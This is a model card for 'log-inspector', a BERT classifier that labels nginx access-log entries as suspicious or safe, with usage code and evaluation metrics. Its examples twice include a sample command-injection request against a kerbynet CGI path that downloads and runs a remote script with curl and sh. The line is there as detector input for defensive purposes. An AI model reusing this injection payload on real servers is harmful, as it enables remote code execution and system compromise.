log-inspector: open-source log inspection model, free to deploy, for identifying suspicious and safe logs

Log Inspector

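Developed by u-haru

A pretrained model, trained on nginx access logs, that classifies log entries as suspicious or safe.

Text classification

Transformers

Language: English

License: Apache-2.0

Tags: #Nginx-log-analysis #malicious-request-detection #BERT-pretraining

Downloads: 138

Published: 12/23/2022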

Model overview

The model is based on the bert-base-cased architecture and is built specifically to analyze nginx access logs and flag suspicious entries.

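Model features

High accuracy

Classifies 9,990 of the 10,000 logs in the reported evaluation correctly (99.9% accuracy), separating suspicious logs from safe ones.

Pretrained model

Built on the pretrained bert-base-cased model, so it inherits that model's general text understanding.

Easy to use

Works with both transformers and simpletransformers, which makes integration quick.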

Model capabilities

Log classification

Suspicious log detection

Safe log identification

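Use cases

Network security

Suspicious log detection

Detects suspicious entries in nginx access logs, such as potential attack attempts.

In an evaluation on 10,000 logs, the model classified 9,990 correctly: 9,964 true positives and 26 true negatives, with 10 false negatives and no false positives.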

🚀 Log Inspector

This pretrained model is trained on nginx access logs, is built on bert-base-cased, and can be used to inspect logs.

🚀 Quick start

The model can be used to inspect logs. Each input text must be formatted as follows: "path: <path>; ref:<referer>; ua:<user agent>;"
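A minimal sketch of how a raw access-log line might be converted into this format. It assumes nginx's default `combined` log format; the regular expression and the helper names `format_log` and `from_combined_line` are illustrative and are not part of the model or its documentation.

```python
import re

# Assumed layout: nginx's default "combined" access-log format.
COMBINED = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def format_log(path: str, ref: str = "-", ua: str = "-") -> str:
    """Build the 'path: ...; ref:...; ua:...;' string described above."""
    return f"path: {path}; ref:{ref}; ua:{ua};"


def from_combined_line(line: str) -> str:
    """Extract request path, referer and user agent from one log line."""
    m = COMBINED.match(line)
    if m is None:
        raise ValueError("line does not match the assumed combined format")
    parts = m.group("request").split(" ")
    # A well-formed request is "METHOD PATH PROTOCOL"; otherwise keep the raw text.
    path = parts[1] if len(parts) >= 3 else m.group("request")
    return format_log(path, m.group("ref"), m.group("ua"))


line = ('203.0.113.7 - - [23/Dec/2022:10:00:00 +0000] '
        '"GET /index.html?x=1 HTTP/1.1" 200 612 "-" "curl/7.68.0"')
print(from_combined_line(line))
# path: /index.html?x=1; ref:-; ua:curl/7.68.0;
```

By default nginx writes certain characters in logged variables, such as `"`, in escaped form (`\x22`). The source does not say whether such sequences should be decoded before classification, so this sketch leaves them untouched.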

💻 Usage examples

Basic usage

>>> from transformers import pipeline
>>> inspector = pipeline('text-classification', model="u-haru/log-inspector")
>>> inspector('path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]

Class 0 (LABEL_0) means a suspicious log; class 1 (LABEL_1) means a safe log.
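To make the pipeline output easier to read, the generic label names can be mapped to the meanings stated above. This is a small sketch; `LABEL_NAMES` and `describe` are hypothetical helpers, not something the model ships with.

```python
# Label meaning as stated in the text: LABEL_0 = suspicious, LABEL_1 = safe.
LABEL_NAMES = {"LABEL_0": "suspicious", "LABEL_1": "safe"}


def describe(results):
    """Convert pipeline output dicts into (readable label, score) tuples."""
    return [(LABEL_NAMES[r["label"]], r["score"]) for r in results]


# The result shown in the basic usage example.
print(describe([{'label': 'LABEL_0', 'score': 0.9999788999557495}]))
# [('suspicious', 0.9999788999557495)]
```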

Advanced usage

Using simpletransformers:

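>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> use_cuda = True  # placeholder: set to False to force CPU
>>> param = {}  # placeholder: simpletransformers model args (an empty dict keeps the defaults)
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)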
>>> predictions, raw_outputs = model.predict(['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]
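`predict` also returns `raw_outputs` alongside the predicted class indices. Assuming these are per-class logits (the simpletransformers documentation describes them as raw model outputs), a softmax turns one row into probabilities. The sketch below uses only the standard library, and the input values are made up for illustration; they are not real model output.

```python
import math


def softmax(logits):
    """Numerically stable softmax over one row of logits."""
    peak = max(logits)
    exps = [math.exp(x - peak) for x in logits]
    total = sum(exps)
    return [e / total for e in exps]


# Hypothetical logits for one log line: index 0 = suspicious, index 1 = safe.
row = [4.0, -4.0]
probs = softmax(row)
print(probs[0] > probs[1])  # True
```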

Evaluation or training:

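>>> import pandas as pd
>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> use_cuda = True  # placeholder: set to False to force CPU
>>> param = {}  # placeholder: simpletransformers model args (an empty dict keeps the defaults)
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log",0],["Safe log",1]]  # [text, label]; 0 = suspicious, 1 = safe
>>> df = pd.DataFrame(data, columns=["text", "labels"])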

>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}

The model was trained on 9,500 access logs. The evaluation scores are:

{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}

Results of an evaluation on 10,000 logs:

{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}
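The gap between the near-perfect accuracy and the lower MCC in this last result can be reproduced from the confusion-matrix counts alone. The sketch below applies the standard accuracy and Matthews correlation coefficient formulas; `summarize` is a hypothetical helper name.

```python
import math


def summarize(tp, tn, fp, fn):
    """Return (accuracy, MCC) computed from confusion-matrix counts."""
    total = tp + tn + fp + fn
    accuracy = (tp + tn) / total
    denom = math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    # MCC is undefined when a row or column of the matrix is empty; use 0.0 then.
    mcc = (tp * tn - fp * fn) / denom if denom else 0.0
    return accuracy, mcc


accuracy, mcc = summarize(tp=9964, tn=26, fp=0, fn=10)
print(accuracy)       # 0.999
print(round(mcc, 4))  # 0.8494
```

Only 26 of the 10,000 logs fall in the negative class, so the 10 false negatives barely affect accuracy but weigh heavily on MCC, which accounts for class imbalance.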